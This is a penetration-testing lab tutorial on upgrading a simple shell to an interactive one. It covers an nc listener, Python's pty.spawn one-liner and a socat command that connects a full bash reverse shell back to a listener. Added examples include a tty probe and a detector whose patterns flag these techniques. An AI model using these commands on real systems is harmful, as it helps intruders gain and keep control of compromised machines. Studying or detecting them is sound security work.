Upgrading Simple Shell to Interactive Shell

Beginner

Introduction

In the field of penetration testing, gaining access to a target system often involves obtaining a shell, which can be a simple shell or an interactive shell. A simple shell is limited in functionality and lacks interactive capabilities, while an interactive shell provides a more robust and user-friendly environment. This lab aims to explore the differences between simple and interactive shells, and guide you through the process of upgrading a simple shell to an interactive shell.

Understanding Simple Shell

In this step, we will explore the concept of a simple shell and its limitations. A simple shell is typically obtained through remote command execution vulnerabilities or other exploitation techniques. While it allows you to execute commands on the target system, it lacks several essential features that can hinder the post-exploitation phase.

  1. To begin, open a terminal window and navigate to the /home/labex/project directory:

    cd /home/labex/project
  2. To simulate the process of obtaining a simple shell on the target system, you need to set up a listener on port 5911 using the nc command:

    nc -lnvp 5911

    Expected output:

    labex:project/ $ nc -lnvp 5911
    listening on [any] 5911 ...

    This terminal window will act as the listener for the simple shell connection.

  3. Open another terminal window and navigate to the /home/labex/project directory, where you should find an exploit.sh file. This script simulates a remote command execution exploit that can be used to obtain a simple shell on the target system.

    cd /home/labex/project

    Run the exploit.sh script to connect to the listener on port 5911 and obtain a simple shell on the target system:

    ./exploit.sh

    Expected output:

    labex:project/ $ ./exploit.sh
    Simulating attack...
    Shell has been rebound, please check the terminal which you listen to the port 5911

    This script will connect to the listener on port 5911 and provide you with a simple shell on the target system.

  4. Back in the terminal window where you set up the listener, you should see a connection established with the target system.

    Example output:

    labex:project/ $ nc -lnvp 5911
    listening on [any] 5911 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38696

    You can verify that you have obtained a simple shell by executing commands such as whoami and lsb_release -a. You will notice, however, that the simple shell has no proper command prompt, no tab completion, and cannot run programs that need a terminal, such as su or ssh.

Upgrading to an Interactive Shell With Python

One way to upgrade a simple shell to an interactive shell is Python's pty module, which spawns a process attached to a newly allocated pseudo-terminal (pts).

  1. First, check whether Python is installed on the target system by running the following command:

    which python
  2. If Python is available, you can create a pseudo-terminal using the following command:

    python -c 'import pty; pty.spawn("/bin/bash");'

    This command spawns a new bash process attached to a pseudo-terminal, so programs that require a terminal, such as su and ssh, now run without complaint.

    Example output:

    labex:project/ $ python -c 'import pty; pty.spawn("/bin/bash");'
    labex@660d6d4be229593d40db954d:~/project$
  3. You can verify that the new shell is a pseudo-terminal by running the tty command and redirecting the output to a file:

    tty > /home/labex/project/shell.txt

    Check the contents of the shell.txt file to see whether the shell is attached to a pseudo-terminal (pts).

    cat /home/labex/project/shell.txt

    Example output:

    labex@660d6d4be229593d40db954d:~/project$ cat /home/labex/project/shell.txt
    /dev/pts/5
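The verification step above can be reproduced without a target. The following script is an added example, not part of the lab: it runs the same check that the tty command performs, first with stdin redirected away from a terminal (what a simple shell gives a program) and then on a pseudo-terminal allocated with the same pty module, which is why su and ssh fail in the first case and work in the second. It assumes only a POSIX system with /dev/pts and that the interpreter running the script can be launched again as the child.

```python
import os
import pty
import subprocess
import sys

# The child does what the `tty` command does: is fd 0 a terminal and, if so, which
# device? It is written in Python so the example needs no coreutils (assumption:
# the interpreter running this script can also be launched as the child).
CHILD_CHECK = "import os; print(os.ttyname(0) if os.isatty(0) else 'not a tty')"


def drain_master(master_fd: int) -> bytes:
    """Read all buffered child output; once the slave is closed Linux ends the
    stream with EIO and macOS with EOF, and either condition stops the loop."""
    out = b""
    while True:
        try:
            chunk = os.read(master_fd, 4096)
        except OSError:
            break
        if not chunk:
            break
        out += chunk
    return out


def probe_stdin(with_pty: bool) -> str:
    """Report what a child sees on stdin. with_pty=False mimics a simple shell
    (stdin is not a terminal, so su/ssh refuse to run); with_pty=True mimics
    pty.spawn(): the child sits on a freshly allocated pseudo-terminal."""
    cmd = [sys.executable, "-c", CHILD_CHECK]
    if not with_pty:
        result = subprocess.run(cmd, stdin=subprocess.DEVNULL,
                                stdout=subprocess.PIPE, text=True)
        return result.stdout.strip()

    master, slave = pty.openpty()
    try:
        subprocess.run(cmd, stdin=slave, stdout=slave, stderr=slave)
    finally:
        os.close(slave)  # closing our copy lets the master side see the hangup
    try:
        raw = drain_master(master)
    finally:
        os.close(master)
    # The pty line discipline rewrites "\n" as "\r\n"; normalise before returning.
    return raw.decode(errors="replace").replace("\r\n", "\n").strip()
```

probe_stdin(False) returns "not a tty", the same text the tty command prints in a simple shell, while probe_stdin(True) returns a device path such as /dev/pts/5.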

However, while the Python pseudo-terminal addresses some limitations of the simple shell, it still lacks certain features like tab completion, history navigation, and proper support for text editors like vim or vi.

PS: You can log out of the pseudo-terminal shell by typing exit or pressing Ctrl+D.

Upgrading to a Full Interactive Shell With Socat

For a more comprehensive solution, we can use the socat utility to obtain a full interactive shell with support for all features, including tab completion, history navigation, and text editor compatibility.

First, check if socat is installed on the target system by running the following command:

which socat

If socat is available, follow these steps:

  1. Open a new terminal window and start a listener on port 5912 using the following socat command:

    socat file:`tty`,raw,echo=0 tcp-listen:5912

    Wait for the connection to be established.

  2. In the simple shell, execute the following command to connect to the listener and upgrade the shell to a full interactive shell:

    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:5912
  3. Back in the terminal window where you set up the listener, you should see a connection established with the target system. You should now have a fully interactive shell with all the features you would expect from a regular terminal session.

    Example output:

    labex:project/ $ socat file:`tty`,raw,echo=0 tcp-listen:5912
    labex@660d5d5ee229593d40db9301:~$

Test the new interactive shell by using commands like cat, ssh, vim, and navigating through command history using the up and down arrow keys.
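From the defender's side, both upgrade methods in this lab leave a recognisable process command line on the target host. The following script is an added example, not part of the lab: it scans process-creation records for the pty.spawn and socat exec/pty patterns used above. The key=value record shape and the sample lines are constructed for the example and are not real auditd output.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Signatures of the two upgrade techniques as they appear in a process command
# line on the target (the nc/socat listeners run on the other side, so they are
# not useful as host indicators).
RULES = [
    ("python pty.spawn upgrade", re.compile(r"\bpty\.spawn\s*\(")),
    ("socat pty shell", re.compile(r"\bsocat\b.*\bexec:.*\bpty\b", re.IGNORECASE)),
]

# Constructed sample records in a simple key=value shape (not real auditd output).
SAMPLE_EVENTS = [
    "pid=1240 user=www-data cmd=python -c 'import pty; pty.spawn(\"/bin/bash\");'",
    "pid=1251 user=www-data cmd=socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:5912",
    "pid=1302 user=labex cmd=python3 manage.py runserver",
    "pid=1310 user=labex cmd=socat -v tcp-listen:8080,fork tcp:backend:80",
]

EVENT_RE = re.compile(r"^pid=(\d+) user=(\S+) cmd=(.*)$")


@dataclass
class Finding:
    pid: int
    user: str
    technique: str
    cmdline: str


def classify(cmdline: str) -> Optional[str]:
    """Return the matching technique name, or None if no rule matches."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def scan(events) -> List[Finding]:
    """Parse each record and keep those whose command line matches a rule.
    Malformed records are skipped rather than aborting the scan."""
    findings = []
    for line in events:
        m = EVENT_RE.match(line)
        if not m:
            continue
        pid, user, cmd = int(m.group(1)), m.group(2), m.group(3)
        technique = classify(cmd)
        if technique:
            findings.append(Finding(pid, user, technique, cmd))
    return findings
```

Matching on command lines is deliberately coarse: it catches the textbook invocations shown in this lab, and the last two sample records show that ordinary python and socat usage does not trigger it.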

Summary

In this lab, we explored the concept of simple and interactive shells in the context of penetration testing. We learned about the limitations of simple shells and the importance of upgrading to an interactive shell for efficient post-exploitation activities. We covered two methods for upgrading a simple shell: using Python's pty module to create a pseudo-terminal, and using the socat utility to obtain a full interactive shell with all the necessary features. By practicing these techniques, you have gained valuable skills that will aid you in future penetration testing engagements, enabling you to overcome the challenges posed by simple shells and streamline your post-exploitation efforts.
